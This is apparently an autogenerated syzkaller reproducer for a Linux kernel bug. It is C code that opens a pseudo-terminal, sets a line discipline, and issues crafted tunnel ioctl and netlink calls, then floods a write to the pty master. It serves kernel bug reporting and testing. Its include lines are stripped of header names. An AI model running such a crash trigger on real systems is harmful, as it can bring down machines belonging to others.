// https://syzkaller.appspot.com/bug?id=1708e7a511059b09d2d4136150d3e67ff9dcf25f // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include static long syz_open_pts(volatile long a0, volatile long a1) { int ptyno = 0; if (ioctl(a0, TIOCGPTN, &ptyno)) return -1; char buf[128]; sprintf(buf, "/dev/pts/%d", ptyno); return open(buf, a1, 0); } uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 3ul, 0x32ul, -1, 0); intptr_t res = 0; memcpy((void*)0x20000040, "/dev/ptmx\000", 10); res = syscall(__NR_openat, 0xffffffffffffff9cul, 0x20000040ul, 6ul, 0ul); if (res != -1) r[0] = res; *(uint32_t*)0x203b9fdc = 0; *(uint32_t*)0x203b9fe0 = 0; *(uint32_t*)0x203b9fe4 = 0; *(uint32_t*)0x203b9fe8 = 0; *(uint8_t*)0x203b9fec = 0; memcpy((void*)0x203b9fed, "\000\000\000\000\000\000\000\000\000\000\000\000" "\000\000\000\000\000\000\000", 19); syscall(__NR_ioctl, r[0], 0x40045431ul, 0x203b9fdcul); res = syz_open_pts(r[0], 0); if (res != -1) r[1] = res; *(uint32_t*)0x20fd0ffc = 7; syscall(__NR_ioctl, r[1], 0x5423ul, 0x20fd0ffcul); *(uint8_t*)0x200005c0 = 0xfe; *(uint8_t*)0x200005c1 = 0x80; *(uint8_t*)0x200005c2 = 0; *(uint8_t*)0x200005c3 = 0; *(uint8_t*)0x200005c4 = 0; *(uint8_t*)0x200005c5 = 0; *(uint8_t*)0x200005c6 = 0; *(uint8_t*)0x200005c7 = 0; *(uint8_t*)0x200005c8 = 0; *(uint8_t*)0x200005c9 = 0; *(uint8_t*)0x200005ca = 0; *(uint8_t*)0x200005cb = 0; *(uint8_t*)0x200005cc = 0; *(uint8_t*)0x200005cd = 0; *(uint8_t*)0x200005ce = 0; *(uint8_t*)0x200005cf = 0xaa; *(uint8_t*)0x200005d0 = 0xfe; *(uint8_t*)0x200005d1 = 0x80; *(uint8_t*)0x200005d2 = 0; *(uint8_t*)0x200005d3 = 0; *(uint8_t*)0x200005d4 = 0; *(uint8_t*)0x200005d5 = 0; *(uint8_t*)0x200005d6 = 0; *(uint8_t*)0x200005d7 = 0; *(uint8_t*)0x200005d8 = 0; *(uint8_t*)0x200005d9 = 0; *(uint8_t*)0x200005da = 0; *(uint8_t*)0x200005db = 0; *(uint8_t*)0x200005dc = 0; *(uint8_t*)0x200005dd = 0; *(uint8_t*)0x200005de = 0; *(uint8_t*)0x200005df = 0xbb; *(uint8_t*)0x200005e0 = 0; *(uint8_t*)0x200005e1 = 0; *(uint8_t*)0x200005e2 = 0; *(uint8_t*)0x200005e3 = 0; *(uint8_t*)0x200005e4 = 0; *(uint8_t*)0x200005e5 = 0; *(uint8_t*)0x200005e6 = 0; *(uint8_t*)0x200005e7 = 0; *(uint8_t*)0x200005e8 = 0; *(uint8_t*)0x200005e9 = 0; *(uint8_t*)0x200005ea = -1; *(uint8_t*)0x200005eb = -1; *(uint8_t*)0x200005ec = 0xac; *(uint8_t*)0x200005ed = 0x14; *(uint8_t*)0x200005ee = 0x14; *(uint8_t*)0x200005ef = 0xbb; *(uint32_t*)0x200005f0 = 2; *(uint16_t*)0x200005f4 = 0; *(uint16_t*)0x200005f6 = 0; *(uint32_t*)0x200005f8 = 0; *(uint64_t*)0x20000600 = 0; *(uint32_t*)0x20000608 = 0; *(uint32_t*)0x2000060c = 0; syscall(__NR_ioctl, -1, 0x89a0ul, 0x200005c0ul); *(uint64_t*)0x200001c0 = 0; *(uint32_t*)0x200001c8 = 0; *(uint64_t*)0x200001d0 = 0x20000300; *(uint64_t*)0x20000300 = 0x20000240; *(uint32_t*)0x20000240 = 0x34; *(uint16_t*)0x20000244 = 0x14; *(uint16_t*)0x20000246 = 0x95b5; *(uint32_t*)0x20000248 = 0; *(uint32_t*)0x2000024c = 0; *(uint8_t*)0x20000250 = 0xa; *(uint8_t*)0x20000251 = 0; *(uint8_t*)0x20000252 = 0; *(uint8_t*)0x20000253 = 0; *(uint32_t*)0x20000254 = 0; *(uint16_t*)0x20000258 = 8; *(uint16_t*)0x2000025a = 8; *(uint32_t*)0x2000025c = 0xae6b531f; *(uint16_t*)0x20000260 = 0x14; *(uint16_t*)0x20000262 = 2; *(uint8_t*)0x20000264 = 0; *(uint8_t*)0x20000265 = 0; *(uint8_t*)0x20000266 = 0; *(uint8_t*)0x20000267 = 0; *(uint8_t*)0x20000268 = 0; *(uint8_t*)0x20000269 = 0; *(uint8_t*)0x2000026a = 0; *(uint8_t*)0x2000026b = 0; *(uint8_t*)0x2000026c = 0; *(uint8_t*)0x2000026d = 0; *(uint8_t*)0x2000026e = -1; *(uint8_t*)0x2000026f = -1; *(uint32_t*)0x20000270 = htobe32(0); *(uint64_t*)0x20000308 = 0x34; *(uint64_t*)0x200001d8 = 1; *(uint64_t*)0x200001e0 = 0; *(uint64_t*)0x200001e8 = 0; *(uint32_t*)0x200001f0 = 0; syscall(__NR_sendmsg, -1, 0x200001c0ul, 0ul); syscall(__NR_write, r[0], 0x200000c0ul, 0xffa8ul); return 0; }